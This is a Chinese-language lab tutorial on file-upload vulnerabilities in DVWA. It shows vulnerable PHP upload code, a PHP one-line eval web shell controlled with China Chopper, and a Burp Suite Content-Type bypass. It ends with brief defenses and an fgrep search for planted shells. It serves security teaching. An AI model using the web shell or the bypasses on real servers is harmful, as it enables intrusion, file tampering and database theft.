网络攻防入门---文件上传漏洞及防御

朱雀 2022-12-31 01:28 157阅读 0赞

一：下载相应的工具  
VMware

[Kali linux2020.3下载与安装详细教程][Kali linux2020.3]

[OWASP Broken Web Apps渗透测试环境搭建和安装教程][OWASP Broken Web Apps]

[中国菜刀下载][Link 1]

二：主要是使用靶机OWASP Broken Web Apps中的Damn Vulnerable Web App作为攻击目标，其中的upload存在文件上传漏洞  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70]  
其中的DVWA Security可以设置安全等级，共有三个安全等级low,medium,high  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 1]  
三：low安全等级  
此安全等级下的upload源码

<?php
        if (isset($_POST['Upload'])) { 
    
                $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    
                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { 
                    
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                    
                  } else { 
                
                    echo '<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    
                }
    
            }
    ?>

因为没有对用户上传的文件进行解析判断，而是直接将上传文件保存到服务器，恶意用户可以直接上传一句话木马到服务器再通过中国菜刀对服务器进行控制。

具体来说，上传一个携带一句话木马的PHP文件

<?php @eval($_POST['chopper']);?>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 2]  
再将该木马文件在服务器的路径添加到中国菜刀，

http://192.168.232.128/dvwa/hackable/uploads/shell.php

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 3]  
接着就可以实现对目标服务器的控制，可以随意上传，删除，添加目标服务器的文件  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 4]  
添加MySQL的配置能访问目标服务器的数据库信息  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 5]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 6]

四：medium安全等级

<?php
        if (isset($_POST['Upload'])) { 
    
                $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                $target_path = $target_path . basename($_FILES['uploaded']['name']);
                $uploaded_name = $_FILES['uploaded']['name'];
                $uploaded_type = $_FILES['uploaded']['type'];
                $uploaded_size = $_FILES['uploaded']['size'];
    
                if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){ 
    
    
                    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { 
                    
                        echo '<pre>';
                        echo 'Your image was not uploaded.';
                        echo '</pre>';
                        
                      } else { 
                    
                        echo '<pre>';
                        echo $target_path . ' succesfully uploaded!';
                        echo '</pre>';
                        
                        }
                }
                else{ 
                    echo '<pre>Your image was not uploaded.</pre>';
                }
            }
    ?>

对上传文件类型检查，只允许image/jpeg类型的文件上传，此时无法直接上传PHP文件，但是我们可以借助kali里面的工具Burp Suite，使用它的代理功能对浏览器发往服务器的请求进行拦截，然后在Burp Suite里修改请求的文件类型，这样就能成功上传文件。

在浏览器里设置代理，http proxy的地址就是kali虚拟机的IP地址，Burp Suite默认端口是8080  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 7]  
为了让虚拟机外部的浏览器也能使用kali的Burp Suite代理功能，在Burp Suite里设置监听所有端口。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 8]

在Burp Suite里打开拦截  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 9]  
当Burp Suite拦截到请求之后，修改Content-Type:为

Content-Type:image/jpeg

就能成功上传PHP木马脚本，接下来的操作就和之前一样了  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 10]  
五：high安全等级

<?php
    if (isset($_POST['Upload'])) { 
    
                $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                $target_path = $target_path . basename($_FILES['uploaded']['name']);
                $uploaded_name = $_FILES['uploaded']['name'];
                $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
                $uploaded_size = $_FILES['uploaded']['size'];
    
                if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){ 
    
    
                    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { 
                        
                        echo '<pre>';
                        echo 'Your image was not uploaded.';
                        echo '</pre>';
                    
                      } else { 
                    
                        echo '<pre>';
                        echo $target_path . ' succesfully uploaded!';
                        echo '</pre>';
                        
                        }
                }
                
                else{ 
                    
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
    
                }
            }
    
    ?>

此时直接通过文件后缀名判断文件类型

可以通过给图片添加一句话代码，然后上传到服务器，执行图片之后生成一句话木马（图片的执行需要利用文件包含漏洞），进行攻击。

六：如何防御  
对于上传的文件要做好筛选，检测，只允许需要的文件类型上传。

使用类似waf防火墙设置规则对恶意文件拦截

若是怀疑服务器里存在类似的木马攻击，通过fgrep命令去查找类似木马的文件

root@owaspbwa:/owaspbwa/dvwa-git/hackable/uploads# fgrep -R 'php @eval($_POST' /owaspbwa
    ./shell.php:<?php @eval($_POST['chopper']);?>

[参考][Link 2]

[Kali linux2020.3]: https://blog.csdn.net/qq_34028816/article/details/109682460
[OWASP Broken Web Apps]: https://blog.csdn.net/huweiliyi/article/details/105513776
[Link 1]: https://github.com/raddyfiy/caidao-official-version
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70]: /images/20221120/cb39d4b115774a7e972622e49d4db6ea.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 1]: /images/20221120/780d03af319c4d2dbe52b1b5b7e23c52.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 2]: /images/20221120/98a59ddcf83b4722a74a78b350cb24a6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 3]: /images/20221120/532aa637fc6149a0908d43e720e6356e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 4]: /images/20221120/00e10cb7e8c94571a8c97573190b2ba9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 5]: /images/20221120/03806918529744f88ea2ceb35541f9b4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 6]: /images/20221120/f99eb3c0ca8c4313a48ae07f79fb5a96.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 7]: /images/20221120/baea572b764945aabfad44cc48f2021d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 8]: /images/20221120/336bef9b477d4b33857ed30dc926c611.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 9]: /images/20221120/584255bde09247e3884e3e5e7430be27.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 10]: /images/20221120/eed2d28b2b7240f88f86d6d8b4d9bafe.png
[Link 2]: https://www.bilibili.com/video/BV1E4411L7zS?p=7